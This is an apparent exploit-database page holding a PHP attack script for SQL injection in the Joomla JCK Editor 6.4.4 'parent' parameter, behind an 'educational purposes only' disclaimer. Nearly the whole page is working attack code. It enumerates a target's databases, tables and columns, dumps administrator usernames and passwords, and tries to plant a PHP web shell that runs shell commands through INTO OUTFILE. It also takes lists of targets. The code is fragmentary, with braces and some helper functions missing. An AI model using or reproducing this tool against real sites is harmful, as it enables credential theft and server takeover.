Exploits / Vulnerability Discovered : 2021-03-08 |
Type : webapps |
Platform : php
This exploit / vulnerability Joomla jck editor 6.4.4 parent sql injection (2) is for educational purposes only and if it is used you will do on your own risk!
function parse_columns($columns){
$parsed_columns = array();
foreach($columns as $col){
array_push($parsed_columns, $col);
array_push($parsed_columns, "0x242324"); //delimiter = $#$
return $parsed_columns;
function inject($url, $payload){
global $vuln_file;
$request = get_request($url.$vuln_file.$payload);
preg_match_all('/url ="(.*)">/', $request, $output);
return $output;
function is_vulnerable($url){
global $vuln_file;
$output = inject($url, payload("0x6861636b6564"));
if(base64_encode($output[1][0]) == "aGFja2Vk"){ //checking if we can inject
return 1;
return 0;
function get_db_names($url){
global $vuln_file;
$db_names = array();
$output = inject($url, payload("schema_name", "%20from%20information_schema.schemata"));
foreach($output[1] as $db){
array_push($db_names, $db);
return $db_names;
function get_table_names($url, $db){
global $vuln_file;
$table_names = array();
$output = inject($url, payload("table_name", "%20from%20information_schema.tables%20WHERE%20table_schema=%27".$db."%27"));
foreach($output as $table){
array_push($table_names, $table);
return $table_names;
function get_column_names($url, $table){
global $vuln_file;
$column_names = array();
$output = inject($url, payload("column_name", "%20from%20information_schema.columns%20WHERE%20table_name=%27".$table."%27"));
foreach($output as $column){
array_push($column_names, $column);
return $column_names;
function rce($url){ //probably won't work =(
global $vuln_file;
die(red("[-] Target isn't vulnerable."));
$server_root = array("/var/www/", "/var/www/html/", "/usr/local/apache2/htdocs/", "/var/www/nginx-default/", "/srv/www/", "/usr/local/apache2/htdocs/");
$rand_content = "AklOGg8kJ7GfbIuBYfDS2apD4L2vADk8QgODUg2OmDNy2";
$payl0ad = "'<?php system(\$_GET[0]); ?> ".$rand_content."'";
$filename = rand(1000, 7359).".php";
echo cyan("[i]")." Trying to upload a RCE shell...\n";
foreach($server_root as $path){
inject($url, payload($payl0ad, " INTO OUTFILE '".$path.$filename."'"));
$get_shell = get_request($url."/".$filename);
if(strpos($get_shell, $rand_content) !== false){
echo green("[+] RCE shell successfully uploaded! =)\n");
die("Usage: ".$url."/".$filename."?0=whoami\n");
echo(red("[-] ")."Could not upload RCE shell. Maybe stacked queries are not supported. =(\n");
die(cyan("[i] ")."But you can still inject SQL commands! What about dumping the users table? =)\n");
function read_file($url, $file){
global $vuln_file;
function green($str){
return "\e[92m".$str."\e[0m";
function red($str){
return "\e[91m".$str."\e[0m";
function yellow($str){
return "\e[93m".$str."\e[0m";
function cyan($str){
return "\e[96m".$str."\e[0m";
$target = 0;
$rce = 0;
function check(){
global $argv;
global $argc;
global $target;
global $rce;
global $target_list;
global $save_output;
global $verbose;
global $less;
global $specified_db;
$short_args = "u:t:v::h::l::r::d::";
$long_args = array("url:","targets::","verbose::","help::","less::","rce::", "db::");
$options = getopt($short_args, $long_args);
-u, --url: Path to Joomla! plugins (e.g. website.com/site/plugins/)
-h, --help: Help
-v, --verbose: Verbose mode (print tables)
-l, --less: Less outputs (only Administrator usernames and passwords)
-t, --targets: Load a list of targets
-r, --rce: Try to upload a RCE shell
-d, --db: Specifies the DB to dump
if(strlen($target_list) < 2){
if($target !== ""){ // check if URL is ok
if(!preg_match('/^((https?:\/\/)|(www\.)|(.*))([a-z0-9-].?)+(:[0-9]+)?(\/.*)?$/', $target)){
die(red("[i] The target must be a URL.\n"));
if(strpos($target, "plugins") == false){
die(red("[-] You must provide the Joomla! plugins path! (standard: exemple.com/plugins/)\n"));
die(cyan("[-] ")."You can get help with -h.\n");
if($target_list !== 0){ //check if target list is readable
die(red("[-] ")."Could not read target list file.\n");
function exploit($url){ // returns users and passwords
global $vuln_file;
global $verbose;
global $rce;
global $specified_db;
global $less;
echo cyan("\n=========================| ".str_replace("plugins", "", $url)." |=========================\n\n\n");
echo cyan("[+] ")."Checking if target is vulnerable...\n";
if (is_vulnerable($url)){
$main_db = inject($url, payload("database()"))[1];
$user_table = "";
$hostname = inject($url, payload("@@hostname"))[1];
$mysql_user = inject($url, payload("user()"))[1];
$mysql_version = inject($url, payload("@@version"))[1];
$connection_id = inject($url, payload("connection_id()"))[1];
echo cyan("[+] ")."Getting DB names...\n";
$dbs = get_db_names($url);
if(count($dbs) == 0){
echo("[-] There are no DBs available on this target. =(\n");
$db_list = array();
foreach($dbs as $db){
$num_table = count(get_table_names($url, $db)[1]);
echo green("[+] DB found: ").cyan($db." [".$num_table." tables]")."\n";
array_push($db_list, $db);
if($main_db == "" && !$specified_db){
echo(red("[-] Could not find Joomla! default DB. Try to dump another DB with -d. \n"));
if($specified_db !== 0){ // if user doesn't specify a custom db
echo cyan("\n[+] ")."Getting tables from ".yellow($specified_db)."...\n";
$tables = get_table_names($url, $specified_db);
foreach($db_list as $new_db){
if($new_db !== "test" && strlen(strpos($new_db, "information_schema") !== false) == 0){ // neither test nor i_schema
echo cyan("\n[+] ")."Getting tables from ".yellow($new_db)."...\n";
$tables = get_table_names($url, $new_db);
echo cyan("[+] ").yellow(count($tables[1]))." tables found! \n";
if(count($tables[1]) == 0){
echo(red("[-] "."Site is vulnerable, but no tables were found on this DB. Try to dump another DB with -d. \n"));
if($user_table == ""){
echo(red("[-] Could not find Joomla default users table. Try to find it manually!\n"));
echo cyan("[+] ")."Getting columns from ".yellow($user_table)."...\n";
$columns = get_column_names($url, $user_table);
if(count($columns) == 0){
echo(red("[-] There are no columns on this table... =(\n"));
echo cyan("[+] ")."Columns found:\n";
foreach($columns[1] as $coll){
echo $coll."\n";
echo cyan("[+] ")."Dumping usernames from ".yellow($user_table)."...\n";
echo(red("[-] Apparently, the provided target is not vulnerable. =(\n\n"));
echo(cyan("[i] ")."This may be a connectivity issue. If you're persistent, you can try again.\n");